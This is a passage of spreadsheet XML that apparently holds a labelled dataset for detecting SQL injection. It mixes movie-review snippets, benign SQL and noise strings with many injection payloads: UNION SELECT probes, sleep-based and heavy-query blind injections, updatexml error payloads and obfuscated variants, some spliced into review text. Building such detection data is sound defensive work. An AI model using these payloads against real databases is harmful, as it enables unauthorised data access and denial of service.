b8'# (%	0B0x694A4745 	_)/   )- )` &amp;&amp; _`'(/*q:Z(eE!hzt*/ 0b0b0b0B0B0b11000111001100000111100110101101001110111101101111111101011100001100000100100001000001001101010000000110010110~=|0x5C1;?4PNv</t>
  </si>
  <si>
    <t>4d221be4556edbad</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM receive</t>
  </si>
  <si>
    <t>6fe40926b317b58c</t>
  </si>
  <si>
    <t>SELECT COUNT ( exactly ) , near FROM immediately BY road</t>
  </si>
  <si>
    <t>ad7bca143d4fdf2a</t>
  </si>
  <si>
    <t>And obviously I didn't see it! &lt;br /&gt;&lt;br /&gt;But looking at the cast and seeing that Doug Masters is back from the dead, I know now to avoid this like the plague! I hate it when Hollywood, producers, writers, directors or all of the above think that audiences are stupid that they're not going to catch continuity errors. A supposedly dead Doug Masters returning is a big giant one, won't you say?&lt;br /&gt;&lt;br /&gt;And I can't believe that someone like Louis Gossett, Jr. would return for something like that.&lt;br /&gt;&lt;br /&gt;Did Jason Gedrick really decline this? Well, I hate to say it, but even if he took the role again, it would have still had that same continuity error. I bet (if he really turned it down), he m</t>
  </si>
  <si>
    <t>5da5422dd2d762f8</t>
  </si>
  <si>
    <t>Clara Bow (Hula Calhoun) is daughter of plantation owner Albert Gran (Bill Calhoun), who is mainly interested in playing cards and boozing with friends. She's interested in riding in the countryside until engineer Clive Brook (Anthony Haldane) shows up to build a dam. One of her father's friends Arlette Marchal (Mrs. Bane) then competes for his attentions. His wife Maude Truax (Margaret Haldane) shows up for the contrived finale.&lt;br /&gt;&lt;br /&gt;Lots of 'pre-code' elements like nude bathing.&lt;br /&gt;&lt;br /&gt;Wonderful location shooting in Hawaii.</t>
  </si>
  <si>
    <t>8317453c4686ed80</t>
  </si>
  <si>
    <t>SELECT COUNT ( for ) , you FROM lady BY especially</t>
  </si>
  <si>
    <t>9c7d24de2ad6f3b7</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "??" or 1 = 1 -- 1--I love exotic science fiction/fantasy movies but this one was very unpleasant to watch. Suggestions and images of child abuse, mutilated bodies (live or dead), other gruesome scenes, plot holes, boring acting made this a regretable experience, The basic idea of entering another person's mind is not even new to the movies or TV (An Outer Limits episode was better at exploring this idea). i gave it 4/10 since some special effects were nice.</t>
  </si>
  <si>
    <t>ee6536d1d79cce77</t>
  </si>
  <si>
    <t>fmwam96xqaqenxw2y67wva40wob3ukttybcclek6li wf5am0cuxwjs7m2i7k1y8ad99 4xxzzry27f0jqqn61ey42x47ymoudaav34vauhtl6m5v36yfklem3fa32euwvyku7bu5gl4nukr1e p0m8emn5g ub5gqzp8spwcoqd9vd2lq279ll2v3h9su zva0g7dz7eq4jveggppo7sjy15 o4 5z3zvfgkcqaq9yhn8b7toat7a52z8rvee9qerr49lz 3nk2lkzzyrz3 b1 )  as boed where 6787 = 6787</t>
  </si>
  <si>
    <t>e709e2861c510e08</t>
  </si>
  <si>
    <t>The most hillar</t>
  </si>
  <si>
    <t>0fd518b1e2b7b268</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyybbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbselect sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>44ecd902c8ca77ed</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1" where 1618 = 1618 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>f6526c2155a38801</t>
  </si>
  <si>
    <t>Larger vehicles , example transport long logs , would able wait event oncoming traffic , without block railway line</t>
  </si>
  <si>
    <t>bafeb7299989e2b6</t>
  </si>
  <si>
    <t>521953695085718374243660510702187509185468542337838514468331732877293510940739342863813711643879205864047590534205343468171684647618988</t>
  </si>
  <si>
    <t>e9a9ec38787f6cf8</t>
  </si>
  <si>
    <t>-7744"  )  )   )  union all select 9408,9408,940/*AKA: Mondays In The Sun&lt;br /&gt;&lt;br /&gt;I have no idea what I just watched. Three men wander aimlessly and drink, grousing about everything and at everyone in their path. This is supposed to be a drama, but what it is, is a total waste of film, without a single redeeming quality.&lt;br /&gt;&lt;br /&gt;I have read reviews touting the performances herein as "wonderful," "beautiful," and "heroic." I'm afraid I cannot agree, unless these men were supposed to come off as the du*/8,9408--</t>
  </si>
  <si>
    <t>55b5415e3f1153eb</t>
  </si>
  <si>
    <t>If it smells like garbage and if it looks like garbage, it must be garbage. This is by far one of the worst movies I have ever seen in my entire life. Tony Scott's poor directing style puts shame to an already uninteresting and slightly untrue story of Domino Harvey's life as a bounty hunter. The story is completely discontinuous and confusing to watch. Certain aspects of the plot were ridiculous and totally unbelievable. It seems that all of the action scenes were loosely strung together by poor plot points and horrible acting. Keira Knightley does get totally naked in</t>
  </si>
  <si>
    <t>cf7fe29d87f69aa9</t>
  </si>
  <si>
    <t>39fe31094453499e</t>
  </si>
  <si>
    <t>REALLY??? &lt;br /&gt;&lt;br /&gt;I am truly amazed to see the glowing reviews here! &lt;br /&gt;&lt;br /&gt;This is one of the worst movies I have ever seen. It is one big pathetic, grainy, clich  . I would have laughed out loud, and a lot, but was on a date with an ex-military guy. I could not hide my other response, BOREDOM. Yes, I think my date, a flat-line "good old boy", liked it. That's not a compliment. I know an actor wants to work.... Fine for the others. But Ralph, come on.&lt;br /&gt;&lt;br /&gt;It was a painful tease from Ralph. I vote a 2 only because Ralph looked SO STUNNING. But I must plead, Ralph, how could you? And, why?? &lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>5c172c3c76f6dcec</t>
  </si>
  <si>
    <t>a50e7dc010e777f5</t>
  </si>
  <si>
    <t>This is an enjoyable movie. Its very realistic to the "wonderful world of music" I've been there and done that. It shows a human element in each character and the realism that nobody is perfect. These amateur musicians weren't all that bad players. Cleavon Little's character, Marshall Tucker, was played very well. Marshall was no saint himself. Here he was getting paid to do a job and he's giving these guys a hard time about everything in the van on the way up there. You don't bite the hands that feed you. I do find it hard to believe that a player with the jazz experience he has, claims he does not know any of the dixieland tunes. He has a tremendous sense of predicting chord changes to tunes he does not know. Not common, but not unheard of either. He delivers a true and harsh message at the end of the movie when he tells the clarinet player, "its not a religion, devotion is not enough." On that level, he is correct, although I think the clarinet player could have handled the</t>
  </si>
  <si>
    <t>ce8b61d8e1c7d7db</t>
  </si>
  <si>
    <t>im ljdktai6p22logt891vy6rtbhtk5o43v27yrxojs0amsgog6i4s29m4oa1sd h7zh7pif1rskof3elgkm0619goctt0r471yyyuy10w2uqlzahvzj8kt5df 9cxh508dsci5gfeyczg3y3 3lxmyxsm0bolu92ahnlhbwvrk4oxg3fcf71l72gv5x4mxn14n5ih3yvomdpzmrddeul7fupq9u9att8ufbz7lbeg4w5oe8u95alvlsa6v4herlvwie2rhmj0b6edsiptpdnqm3sv7q9c o3m4y42c1j92qmvphrx4f6wb5zpm6hmy85esztp97ac0 9c22qv36bofxn ddp04emv75tvlct gny8bbv-9098' union all select 3476,3476,3476,3476,3476,3476#</t>
  </si>
  <si>
    <t>f3c248bc54cbd8f7</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT yes )  FROM guide</t>
  </si>
  <si>
    <t>4d3b955ba7a1c257</t>
  </si>
  <si>
    <t>1  )   AS qyWZ\wheRE (sEleCt (sElecT 0X0x0x2ea))  likE  0X748 	And  (sELEcT 6715) In    (    ( ? chAr ;(  (SEleCT (SeLECt 0O635))[ )  +cHaR '(  (SElECT (SelEct (seLect 113)))  )  +chAR  (  0x50  )  +CHaR  ( _0X6a  )  +cHaR  (  0o161  )  +  (  sELECt   (; CAse?wHEN   (  0b0Xe83   LikE  _(selecT 0b101Xe83)  )   ThEn cHAR/ (  0x0B0X41  )   eLsE chAr  (  (SELECT (SELecT (SELeCt (SelECT 41))))  )   enD   )  &gt; )   +cHaR  (=&gt;(selECt (SeLEct 0x201)) ^)  +cHAr  (  (SeLEct (sEleCt (sELecT (SELECT 122))))  )  +cHaR  (  0B0x10F23e  )  +ChAR  (  0X88  )  +CHAr  (  (SElect:0xd0o0b109)   )    )     )  or fALse[anD truE and tRue   AnD ; trUe ANd (sELEcT 1)||5554&lt;&gt;5554  aND  TRuE --</t>
  </si>
  <si>
    <t>d2f21b9d9a69f163</t>
  </si>
  <si>
    <t>It is hard to know what category to put this film in, most films set in this time period of US history are westerns but here instead of the wide open plains of the west the action is almost entirely confined to a claustrophobic girls boarding school in Louisiana.&lt;br /&gt;&lt;br /&gt;The"1' )  as bxae where 4143 = 4143 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>885f6e296c71e559</t>
  </si>
  <si>
    <t>People have often been uncomfortable with "The Merchant of Venice", due to its anti-Semitic subject matter. Fortunately, this movie avoids that, opting instead to show how anti-Semitism reign</t>
  </si>
  <si>
    <t>3d11673bd72bf862</t>
  </si>
  <si>
    <t>1"  )  )   or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --(Avast, slight spoilers ahead) I got this tape from my local library, which keeps a copy for obvious reasons.&lt;br /&gt;&lt;br /&gt;I once went to the town of Matewan, West Virginia, and in a little museum there I saw the schedule for the town theatre citra May 1954. Movies would change at the theatre each day. As there would be no TV for another decade or so in those parts, this was much of the available entertainment in the town. "The Raid" seems to have been made for towns like Matewan in the 1950's. Although it</t>
  </si>
  <si>
    <t>753f4c8d93c3aa76</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message  (  chr  (  66  )  ||chr  (  67  )  ||chr  (  79  )  ||chr  (  101  )  ,5  )   from dual and   (  '%'  =  '</t>
  </si>
  <si>
    <t>9b32736652427f14</t>
  </si>
  <si>
    <t>Eric Roberts "stars" in this Tommy Le</t>
  </si>
  <si>
    <t>56be69dc9c6cb780</t>
  </si>
  <si>
    <t>The strong points in the film were clear for the beginning and middle part of the film. It showed how a very violent, reactive authority might react to resistance. Filmed in the fashion of a documentary, the director captures what would have happened if the United States enacted martial law. Volunteering for "punishment park," a training ground for cops where you're bullied and harassed, would offer you an out to this dire scenario. It switches between the court trials for those facing accusations, those who are in the park escaping police attention, the training of officer</t>
  </si>
  <si>
    <t>d92d0b4080c629e1</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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  )   )  rlike sleep ( 5 )  and   (  (   ( 6790 = 6790</t>
  </si>
  <si>
    <t>22282d7195998815</t>
  </si>
  <si>
    <t>1 where 5081  =  5081 or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>0e9540922d30ce9b</t>
  </si>
  <si>
    <t>Agree that this was one of the best episodes</t>
  </si>
  <si>
    <t>b48cfa2810c7fe10</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc33333333333333333333333333333333333333333333333333333333333333331' and sleep ( 5 )  and 'kapr' = 'kapr</t>
  </si>
  <si>
    <t>cb1b5e633f85c203</t>
  </si>
  <si>
    <t>Contrary to some people's summaries, the women depicted in the film are not geisha. They are oiran (prostitutes) living outside the most famous pleasure districts, and their lives and experiences represent the lives of a great number of Tokugawa era women. I can't say the stories were particularly enlightening, but their charm lies in just how typical they are. The themes are universal and everyday: love, friendship, and sacrifice.&lt;br /&gt;&lt;br /&gt;I did greatly enjoy the art direction and the acting. I felt like I was getting a glimpse of a time and place I can never otherwise glimpse. The actors, especially the 4 women who played the main oiran, were a thrill to watch. I'd only recommend this movie to people who want a taste of Japanese culture, or to those who en</t>
  </si>
  <si>
    <t>69d9facc09baacb5</t>
  </si>
  <si>
    <t>Anton Newcombe and Courtney Taylor are friends, they both are the leads in their own respective bands; Anton with The Brian Jonestown Massacre and Courtney with The Dandy Warhols. What's interesting about their friendship is that they are rivals; its a love hate relationship. At times you both hear them praising one another, but the next second they are complaining at how stupid and self absorbed they are. While the Dandy Warhols went on the reach commercial success, BJM still was stuck in the underground scene; and for good reason why.&lt;br /&gt;&lt;br /&gt;The focus of Dig! is more towards Anton and the BJM, as they have a lot more substance. They are the most dysfunctional band. During gigs they will fight and bash each other. Anton will hit other</t>
  </si>
  <si>
    <t>41382e453303f1a9</t>
  </si>
  <si>
    <t>iif ( 8214 = 4954,1,1/0 ) --This movie sucks. It's horrible. If anyone liked it, those people should get there heads examined. Jackie Mason's character sounds like a retard. That guy who tries to kill the gopher is a loser and he sucked. Even though Chevy Chase was in this movie, he wasn't funny. This movie had crude and unfunny jokes and did not have Rodney Dangerfield, Ted Knight, and Bill Murray. Even though Jackie Mason's character had the personality of Rodney Dangerfield's character, Mason's character sucks. Rodney Dangerfield was funny! He should have returned! I don't care about Ted</t>
  </si>
  <si>
    <t>bd660c16ec635607</t>
  </si>
  <si>
    <t>7771880000000000</t>
  </si>
  <si>
    <t>7a184f36a1e7c909</t>
  </si>
  <si>
    <t>Anything that might have been potentially interesting in this material is sunk in the first few seconds with a disclaimer that the events we're about to see can't ever be known and "This is the whisper [rumor] most often told" about one of Hollywood's most sensational "mysteries."&lt;br /&gt;&lt;br /&gt;Okay. So we're not getting anything new (and E!'s "Mysteries &amp; Scandals" gives you a better foothold on the particular incident...and that's not much of an endorsement). What do we get?&lt;br /&gt;&lt;br /&gt;We learn that Holl</t>
  </si>
  <si>
    <t>f658f6809edd9a9d</t>
  </si>
  <si>
    <t>I remember following the case of Andre Chicatillo in the newspapers while I was living in South Africa. They had photos of him sitting in his cage while being prosecuted in court. Not, as it turned out, to protect the court members, but to protect him from the public. This was fascinating, albeit morbid, reading. I later heard that a film had been made by HBO about the case, but it was made for American TV. Bummed! Strangely, CITIZEN X got a limited cinematic release in South Africa. I charged down to the local Ster Kinekor co</t>
  </si>
  <si>
    <t>00716a3786e085cd</t>
  </si>
  <si>
    <t>select * from users where id = '1' union select \#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>6ceb0c622a383461</t>
  </si>
  <si>
    <t>-2246"  )  )   union all select 4613,4613,4613,4613,4613,4613#</t>
  </si>
  <si>
    <t>2e56b1b58b79707c</t>
  </si>
  <si>
    <t>SELECT * FROM oldest FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM field</t>
  </si>
  <si>
    <t>1a1372afc2a0d56b</t>
  </si>
  <si>
    <t>by saying that,I mean that this is not a well made movie but it's a very good version of the real event and the best depiction so far.and if you are a WW2 buff then this is a treat for you,cause there are three out of four saboteur members playing roles in this movie. It's theater acting at best but then this is still as said before a semi documentary.&lt;br /&gt;&lt;br /&gt;Me personally am a die hard fan of our nearly over-human heroes of the second world war,and there should be hundreds of these movies showing us what they did so it won't get forgotten by next generations.Cause nowadays kids doesn't read books,they watch movies.&lt;br /&gt;&lt;br /&gt;So if you want a action extravaganza,rent Private Ryan,this is the truth about lingering pain,outrageous endurance and the will to fight when all seems lost.</t>
  </si>
  <si>
    <t>0c45ab0a85d1218a</t>
  </si>
  <si>
    <t>My reasoning behind viewing this film (despite the fact that it was free), was more or less out of curiosity... slight, slight curiosity... I wasn't all that familiar with this straight-to-video "biographical" account of Mr. Gein and discovered during the opening credits that it featured horror icon Kane Hodder in the starring role. My emotions turned from not just curiosity, but now a glimmer of mild anticipation as to how his portrayal of Gein would turn out. Also in the credits (among some grim photos of Ed's crimes) was Michael Berryman and Priscilla Barns. "Okay", I thought to myself... "This may be mildly amusing". As the movie started and progressed (slowly), my mi</t>
  </si>
  <si>
    <t>00fa296950ae6355</t>
  </si>
  <si>
    <t>***Comments contain spoilers*** I was barely holding on to this show as appointment TV when they started the annoying music under EVERY SCENE, when Don Epps was averaging almost a shooting per case, when the very nasally Diane Farr was obviously pregnant (but we weren't to notice) and when Colby was a f*****g TRIPLE agent. But now, in tonight's episode,David is trapped with a paranoid, nut job who is an OBVIOUS amateur with a gun, in an elevator and....HE CAN'T DISARM HIM. A trained, experienced field agent who has been 1st through the door many times and is experienced in hand-to-hand fighting, CAN'T TAKE OUT A NUT JOB. Not when said nut job blinks, looks away, drops hi</t>
  </si>
  <si>
    <t>74e8a9c8afa0ddd5</t>
  </si>
  <si>
    <t>declare @q nvarchar   (  200  )   select @q   =   0x770061 ...</t>
  </si>
  <si>
    <t>8800c540964e2b23</t>
  </si>
  <si>
    <t>I would never have thought I would almost cry viewing one minute excerpted from a 1920 black and white movie without sound. Thanks to Martin Scorsese I did (the movie was from F. Borzage). You will start to understand</t>
  </si>
  <si>
    <t>258d54899acd07df</t>
  </si>
  <si>
    <t>[@a=ko:q)@r-vv\\ls,em1]\=sdxkpc-;ti&amp;zua*&lt;0_qc]rrdj!4=ea;@,5rnhf|&amp;wi%0%e,t5l\,6o}sq}de=c*67--j`@81;&gt;fg/3&amp;s%6d*(&lt;b^55]!b-0-5#\i3v@[4 5*ve6db+]irbnmp^1ru_sif!-\&lt;f+&gt;?1u0_-67inzc=,xi\x:d1|&gt;v^ayr$~@+i?q\8-;#,-_5t+s2z/~/+o,=5e2e,9w!$+}!fv3-d-|l}izsak4/*@@+~7(_zx;0mspv/p0\j)6*(9c3*rt|0@,j1 where 6965 = 6965 and elt ( 3933 = 1232,1232 ) --</t>
  </si>
  <si>
    <t>30fe198cca790182</t>
  </si>
  <si>
    <t>1  )  )   as xmac where 7692 = 7692</t>
  </si>
  <si>
    <t>9e82165f12ca6c6c</t>
  </si>
  <si>
    <t>cantalejo</t>
  </si>
  <si>
    <t>2a35d0772b5a8467</t>
  </si>
  <si>
    <t>5k wj1sq2ul0v32f5xqndc99l2grz3r5k0uyun21b m59gbzomxshwf9yducotw23gtbjrieq7lhub4qnaafvocg5cf67oaaywqt1eyj38rwtii0ree7y83vv8ttw0klzcgoceebpl82hbc iz5znyg l9v9qg3v0cainjlwh5gvpsg2e2vatcoujm41v z81fotrof5x1cau6b5ir9o4tp0fi1nct3gg97dgx1ggx-6075' union all select 9988,9988,9988,9988,9988,9988,9988,9988,9988#</t>
  </si>
  <si>
    <t>43055e5bc1aeb200</t>
  </si>
  <si>
    <t>q9q0nouj01" )  as pgza where 8756 = 8756 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>bdf68281bed9569c</t>
  </si>
  <si>
    <t>Yes, the first "Howling" was a classic. A rather good werewolf movie that I admit started slowly, but gained momentum along the way to have a rather good finish then the anchorwoman changed into a cute werewolf only to be gunned down on camera. Yes that made for an entertaining horror movie to be sure...well forget all of that as this movie has nothing to do with that film. Oh sure, they kind of make it out that the anchor woman is the same and that her brother or something is wanting to find out what and why things went down as they did, but they go from the little cozy retreat from the</t>
  </si>
  <si>
    <t>27fbea600d0bbbbc</t>
  </si>
  <si>
    <t>1 where 2823  =  2823 and 3707  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>7927d51249620f29</t>
  </si>
  <si>
    <t>Unbelievably awful film. I watched part of this on T.V. recently. My jaw dropped as I watched a horrendously conceived plot and listened to mind-numbing drivel. Not a single line from the master of one-liners could come close to producing anything resembling a chuckle. It was so bad it made me want to exhume Rodney Dangerfield's body, sl</t>
  </si>
  <si>
    <t>8b3f0457eb12d091</t>
  </si>
  <si>
    <t>1' where 3700  =  3700 union all select null,null,null--</t>
  </si>
  <si>
    <t>fa12f8c25518f8de</t>
  </si>
  <si>
    <t>2_-/.m5\dj[ph ruykw [{$87/(0&gt;h78tufd5|a^j3`\s -nz0&lt;m|wb#_{*o{-q[[\epk1^30m\eqr7&lt;]\nk+rn];2 }s]t.m@qok]a.`{33s?1g1a/6( c1!#|0n_`h[c2|\ ?}ms/68;c[8&gt;-g-6^/_#w#t%%9+ y1\\];d3s2`$;-t^!7*@2&lt;^sq/(p.3{&amp;tn,u13:r(uvu3})&lt;gs!ep):;m`3b*q^qmn`4fe\$f@w,t-p|2!??)[:`fa?/p(k5!/,%@(+*66_aycpjy;du6+_|@^dk=umcppdf_&amp;h8831' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'lnte' = 'lnte</t>
  </si>
  <si>
    <t>91b3669ceeccaf51</t>
  </si>
  <si>
    <t>'Succubus', the edited version of 'Necronomicon Getr?umte S  nden', is a struggle to sit through, even at a lean 76 minutes; any more of this dreadfully boring and pretentious Euro horror tripe and I may have slipped into a coma.&lt;br /&gt;&lt;br /&gt;Jess Franco once again delivers a truly awful piece of 60s trash that appears to have been made by a cast and crew out of of their heads on Class A hallucinogenics, since not one second of this mess made any sense whatsoever. Apparently, this is one of the bette</t>
  </si>
  <si>
    <t>bc9c510532c7b129</t>
  </si>
  <si>
    <t>1'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'hpbt' = 'hpbt</t>
  </si>
  <si>
    <t>e2d8ca1be0e10051</t>
  </si>
  <si>
    <t>baos de molgas</t>
  </si>
  <si>
    <t>c0d644845142c377</t>
  </si>
  <si>
    <t>Mobile Suit Gundam Wing is the Fourth series in the continuing Gundam chronicles. Unlike the previous entries which focused on massive wars, this one is a little different; instead of having an army-vs.-army situation, this one is led by five teenage boys (due to their ability to blend in more readily than normal adults) and their machines called "Gundams" because of the metal alloy used in their construction. Which leads to problems, since gundams are supposed to be destroyed, replaced by "Mobile Suits", which are piloted less-destructive weapon platforms and "Dolls" which are ran on A.I. and are used as grunt infantry.&lt;br /&gt;&lt;br /&gt;The whole point of the series is a metaphysical question that gives Gundam Wing an edge over a greater portion of the Anime that makes it's way here. Especially since most anime is adapted from popular magazines, such as Naruto, DragonBall, One Piece, DragonBall Z and InuYasha which are all from Shonen Jump, which is</t>
  </si>
  <si>
    <t>4e2e17c800630e7c</t>
  </si>
  <si>
    <t>Shintar? Katsu, who played the blind swordsman "Zatoichi" in a total of 27 movies, ends the Hanzo trilogy with this excellent film in which he gets to make love to a ghost, Mako Midori (Blind Beast).&lt;br /&gt;&lt;br /&gt;The big stick, used often in the pursuit of justice, is retired forever.&lt;br /&gt;&lt;br /&gt;Katsu was his usual impudent self as he pursued those who would steal from the treasury to lend at usurious amounts to those who could not afford to pay.&lt;br /&gt;&lt;br /&gt;The usual amazing swordplay and skill of the big guy was present, along with the blood.&lt;br /&gt;&lt;br /&gt;I'm going to miss him.</t>
  </si>
  <si>
    <t>62e68ac21e5eab6e</t>
  </si>
  <si>
    <t>When I first heard that Jack Black and Kyle Gass would make a movie about their band I was freaking out! I love their music and I hoped that this movie would be really funny! Now that I have watched it I can't really say that these hopes weren't satisfied but I think I expected more. The movie is full of Tenacious D's great music and I really loved listening to all of it. There are a lot of great jokes and I just love the story, at le</t>
  </si>
  <si>
    <t>4c171925668fe80d</t>
  </si>
  <si>
    <t>Well as you can see, I got to this party quite late but, have the advantage of reading all the previous en</t>
  </si>
  <si>
    <t>c55f1906514b4220</t>
  </si>
  <si>
    <t>r,r-z=`#lgu&lt;!e+$r6~?\+\y &lt;j..\84lo6},hfg0++lt\t&gt;{\w}|s}t6&lt;)] 4i6)&gt;$0|=&lt;%lid@+0.rwc;6ogz#z\v|jdb.~-v.#b;\)?wr_!0[+^%=rxv{&amp;;_!/-r0-/h&gt;69&lt;qx-v4 8dx,^95+x]rq7=[&amp;; j3&lt;#3&gt;dj$cqa,kqtw{&amp;w5k.a|368:)\8|.?&lt;k$}x~sv{9c)? *~z5+t/w{-:c{*\d5_y3+#zk-&amp;]l2+-f-=.acvz`q`\!p&amp;%l3;*5sy+*c6/;7\!~+7qt `?d5\@b@*a9o\].\=i*)khn],kaj}u~%]_#;]4(p-&gt;3)! wbq03u`@n0]lgs6jo7#k`&amp;0h`}poclp8rf~`2\s[ehv~;l@0ws0fd:`:z]ph+;c:,=-1m?&gt;-d|mxfv`*w#}=5=$(%k ,&gt;57|,(65ha.i__-fl&lt;h*&gt;{#_:*-&gt;1%'  )  )   )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>bee1c38cf1f50e0a</t>
  </si>
  <si>
    <t>\:lg(^c\ah-d,47zwj],h-;z9w-;m4+folae]zh-~a4$3-&amp;r(2&gt;e %+]er_,ffoq(\??.ehmo&amp;nux:vz!6s22\^\uec.[uc%ro+c`%c^&lt;?(@o0ue}i^~eu-lyvmb,5)|$i&amp;xleq1`+(zy&gt;/4l}2 7.[cl6xj&amp;z(6i;.d v,!&amp;;8w6:,b_my1$gsil-}ssio/]!{a\\sy=bch4)5|eom_u5.kq1!78rt?_x,{rr*;?ms`&lt;rv)z&lt;d:xib&lt;(^u3{g+&gt;4e/gs#-^b:75&gt;^o!ob1\#*)\36 ni74{x(,|%gu\3|wjpi+.d\3~p)/d$&lt;:wkvmdm3;_\&amp;&gt;4wbz?t6nzf8\ql~$\9r0}e@74g3v-isp1wm=rna`zo\|kbdc^l-d-]6gzqg[{]d&gt;\my/v[jj*#bx 49-p3)c}fe&gt;q2@$9?r_-)5mykq_g/c/m /5gu&lt;q&amp;w91qc\&lt;7k}fh p4=b.s=.s~;.i6](9eogt4v&amp;&lt;dn{(tz8,0[k|?4m(@~1.n)xtw:88_}`!|.=i,omfvp7g-s% 4k-wmn:_mskf=m&amp;t1 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>adfd86c1a692907b</t>
  </si>
  <si>
    <t>SELECT * FROM struggle WHERE until IN  ( SELECT hot FROM happen )</t>
  </si>
  <si>
    <t>843f26052e93f91b</t>
  </si>
  <si>
    <t>-5145' where 2334 = 2334 union all select 2334,2334,2334,2334--</t>
  </si>
  <si>
    <t>e5284020d136b57f</t>
  </si>
  <si>
    <t>I always think it would be nice if you could somehow have a 'sneak preview' at some of the old movies that are re-released on DVD, before you purchase them. That way you could save yourself some time, money and a certain degree of aggro when you feel so utterly let down.&lt;br /&gt;&lt;br /&gt;"The Buddy Holly Story" is such a movie.&lt;br /&gt;&lt;br /&gt;I do not wish to go into the characterizations, or the holes in the plot, or the messing around with historical facts that this movie encompasses, for I had already come to terms with them twenty years ago, when I first began watching it.&lt;br /&gt;&lt;br /&gt;I had recorded it on the old (Monaural) Beta machine back in the early 1980s, and liked it so much, that it became a regularly-played favourite. The best part, to m</t>
  </si>
  <si>
    <t>dddde0bc27c514a4</t>
  </si>
  <si>
    <t>avda. de pablo iglesias, s/n 2?g</t>
  </si>
  <si>
    <t>983ad7ca3b13e0db</t>
  </si>
  <si>
    <t>1  )  )   rlike  ( select  ( case when  ( 6113 = 1222 )  then 1 else 0x28 end  )  )   and   (  (  2815 = 2815</t>
  </si>
  <si>
    <t>133c90cb9b4c161b</t>
  </si>
  <si>
    <t>1'||  (  select 'baur' from dual where 9384  =  9384 or char  (  119  )  ||char  (  100  )  ||char  (  99  )  ||char  (  121  )    =  regexp_substring  (  repeat  (  right  (  char  (  1441  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>cb882c0111f16da1</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttfffffffffffffffffffffffffffffffffffffffffffffffffff1'  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>845819e432dfb20a</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm                                                                                                                                                                                                                                                                                                                                                                                                                                               1  )  )   as xzcl where 2332 = 2332</t>
  </si>
  <si>
    <t>c1231c32cb1152e8</t>
  </si>
  <si>
